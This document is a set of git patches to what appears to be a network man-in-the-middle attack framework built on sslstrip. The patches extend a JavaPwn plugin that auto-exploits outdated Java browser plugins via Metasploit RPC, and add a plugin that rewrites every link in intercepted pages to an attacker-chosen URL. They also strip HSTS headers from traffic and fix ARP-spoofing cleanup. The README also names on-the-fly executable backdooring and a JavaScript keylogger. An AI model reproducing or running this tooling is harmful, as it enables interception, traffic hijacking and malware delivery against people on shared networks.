From a60a199e59fd84309a2cd257ee3ed9da719201b8 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 01:27:05 +0200 Subject: [PATCH 1/7] added rpcip argument to javapwn --- plugins/JavaPwn.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index 8cd61db..7fe4206 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -22,6 +22,7 @@ class JavaPwn(BrowserProfiler, Plugin): self.options = options self.msfip = options.msfip self.msfport = options.msfport + self.rpcip = options.rpcip if not self.msfip: sys.exit('[-] JavaPwn plugin requires --msfip') @@ -36,7 +37,7 @@ class JavaPwn(BrowserProfiler, Plugin): self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit try: - msf = msfrpc.Msfrpc({}) #create an instance of msfrpc libarary + msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary msf.login('msf', 'abc123') version = msf.call('core.version')['version'] print "[*] Succesfully connected to Metasploit v%s" % version @@ -165,6 +166,7 @@ class JavaPwn(BrowserProfiler, Plugin): def add_options(self, options): options.add_argument('--msfip', dest='msfip', help='IP Address of MSF') options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]') + options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]') def finish(self): '''This will be called when shutting down''' From 0148246155088136c309365dfa7d7f9cc555cb40 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 01:32:34 +0200 Subject: [PATCH 2/7] updated javapwns shutdown function --- plugins/JavaPwn.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index 7fe4206..f89a9d6 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -170,7 +170,7 @@ class JavaPwn(BrowserProfiler, Plugin): def finish(self): '''This will be called when shutting down''' - msf = msfrpc.Msfrpc({}) + msf = msfrpc.Msfrpc({"host": self.rpcip}) msf.login('msf', 'abc123') jobs = msf.call('job.list') if len(jobs) > 0: From 05f6762b5e4db7e145e234ef9b9b8014d1f6d492 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 04:04:44 +0200 Subject: [PATCH 3/7] updated readme --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 053419c..03b7bc1 100644 --- a/README.md +++ b/README.md @@ -17,8 +17,8 @@ So far the most significant changes have been: - Addition of the JsKeylogger plugin -- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory -https://github.com/secretsquirrel/the-backdoor-factory +- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory +https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy - Added msfrpc.py for interfacing with Metasploits rpc server From e83aaa164056ec36c6ef8680a4ad5d2b5550917b Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 04:41:07 +0200 Subject: [PATCH 4/7] added link re-writer plugin --- plugins/Linkrewriter.py | 48 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 plugins/Linkrewriter.py diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py new file mode 100644 index 0000000..5e87801 --- /dev/null +++ b/plugins/Linkrewriter.py @@ -0,0 +1,48 @@ +#There probably is a better way of doing this + +import logging, re, sys, os +from plugins.plugin import Plugin + +class LinkRw(Plugin): + name = "Link Re-Writer" + optname = "linkrw" + implements = ["handleResponse"] + has_opts = True + desc = "Rewrites all href attributes to a specified url" + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.url = options.url + + self.mime = "text/html" + + print "[*] Link Re-Writer plugin online" + + + def handleResponse(self, request, data): + ip,hn,mime = self._get_req_info(request) + if mime.find(self.mime)!=-1: + + data = self.repl_hrefs(data) + logging.info("%s [%s] Re-wrote hrefs" % (request.client.getClientIP(), request.headers['host'])) + return {'request':request,'data':data} + else: + return + + def add_options(self, options): + options.add_argument("--url", type=str, help="URL to re-write") + + def _get_req_info(self, request): + ip = request.client.getClientIP() + hn = request.client.getRequestHostname() + mime = request.client.headers['Content-Type'] + return (ip,hn,mime) + + def repl_hrefs(self, data): + + regex = [re.compile(r"href=[\'\"]http[s]?://.+[\'\"]", re.I)] + + for i,r in enumerate(regex): + data=re.sub(r, "href=" + self.url, data) + return data From bf4506a98a88d8ef88fcab37eb166843cfe977e4 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 04:45:43 +0200 Subject: [PATCH 5/7] updated readme with new plugin --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 03b7bc1..7410173 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,8 @@ https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy ht - Added msfrpc.py for interfacing with Metasploits rpc server +- Added Link Re-Writer plugin + - Addition of the app-cache poisoning attack by Krzysztof Kotowicz - JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!! From 5a5a3e36ec4ddcebd7df04c7562a62583264c706 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 11:08:50 +0200 Subject: [PATCH 6/7] made rpc pass configurable --- plugins/JavaPwn.py | 8 +++++--- plugins/Linkrewriter.py | 2 +- sslstrip/ClientRequest.py | 3 +++ 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index f89a9d6..18d7a16 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -23,6 +23,7 @@ class JavaPwn(BrowserProfiler, Plugin): self.msfip = options.msfip self.msfport = options.msfport self.rpcip = options.rpcip + self.rpcpass = options.rpcpass if not self.msfip: sys.exit('[-] JavaPwn plugin requires --msfip') @@ -38,11 +39,11 @@ class JavaPwn(BrowserProfiler, Plugin): try: msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary - msf.login('msf', 'abc123') + msf.login('msf', self.rpcpass) version = msf.call('core.version')['version'] print "[*] Succesfully connected to Metasploit v%s" % version except: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'") + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) @@ -167,11 +168,12 @@ class JavaPwn(BrowserProfiler, Plugin): options.add_argument('--msfip', dest='msfip', help='IP Address of MSF') options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]') options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]') + options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]') def finish(self): '''This will be called when shutting down''' msf = msfrpc.Msfrpc({"host": self.rpcip}) - msf.login('msf', 'abc123') + msf.login('msf', self.rpcpass) jobs = msf.call('job.list') if len(jobs) > 0: print '[*] Stopping all running metasploit jobs' diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py index 5e87801..9582790 100644 --- a/plugins/Linkrewriter.py +++ b/plugins/Linkrewriter.py @@ -1,4 +1,4 @@ -#There probably is a better way of doing this +#probably a better way of doing this import logging, re, sys, os from plugins.plugin import Plugin diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 6896cc3..5dfad7f 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -56,6 +56,9 @@ class ClientRequest(Request): if 'accept-encoding' in headers: headers['accept-encoding'] == 'identity' + if 'Strict-Transport-Security' in headers: #kill new hsts requests + del headers['Strict-Transport-Security'] + if 'if-modified-since' in headers: del headers['if-modified-since'] From 8c4d55b01b51ded388a403697c8ea91d985f1df7 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 11:34:08 +0200 Subject: [PATCH 7/7] fixed rearping error --- plugins/ArpSpoof.py | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py index 4059f04..1eb5dd7 100644 --- a/plugins/ArpSpoof.py +++ b/plugins/ArpSpoof.py @@ -18,6 +18,7 @@ class ArpSpoof(Plugin): self.options = options self.interface = options.interface self.routerip = options.routerip + self.routermac = getmacbyip(self.routerip) self.summary = options.summary self.target = options.target self.mode = options.mode @@ -30,7 +31,7 @@ class ArpSpoof(Plugin): if os.geteuid() != 0: sys.exit("[-] %s plugin requires root privileges" % self.name) - if self.interface == None or self.routerip == None: + if (not self.interface or not self.routerip): sys.exit("[-] %s plugin requires --routerip and --interface" % self.name) if self.options.log_level == 'debug': @@ -107,7 +108,5 @@ class ArpSpoof(Plugin): file.close() os.system('iptables -t nat -F && iptables -t nat -X') print '[*] Re-arping network' - rearp_mac = getmacbyip(self.routerip) - pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.mac, op=2) - sendp(pkt, inter=1, count=5, iface=self.interface) - sys.exit(0) \ No newline at end of file + pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.routermac, op=2) + sendp(pkt, inter=1, count=5, iface=self.interface) \ No newline at end of file